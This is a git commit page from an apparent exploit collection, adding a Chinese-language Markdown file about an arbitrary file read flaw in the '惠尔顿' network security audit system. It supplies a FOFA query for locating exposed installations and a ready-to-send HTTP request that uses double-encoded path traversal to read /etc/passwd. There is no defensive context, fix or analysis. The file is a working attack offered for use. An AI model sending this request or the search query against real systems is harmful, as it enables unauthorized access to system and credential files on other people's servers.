admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 惠尔顿-网络安全审计系统存在任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2024-03-01 15:33:58 +08:00 committed by GitHub
parent 90c1802379
commit b4038fa094
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
惠尔顿-网络安全审计系统存在任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,19 @@
## 惠尔顿-网络安全审计系统存在任意文件读取漏洞
## fofa
```
app="惠尔顿-网络安全审计系统"
```
![image](https://github.com/wy876/POC/assets/139549762/e66973bc-5f10-487e-a450-8ececd4c198f)
## poc
```
GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```
![image](https://github.com/wy876/POC/assets/139549762/a1659d87-afd3-45d0-8e89-c9f8782da4f8)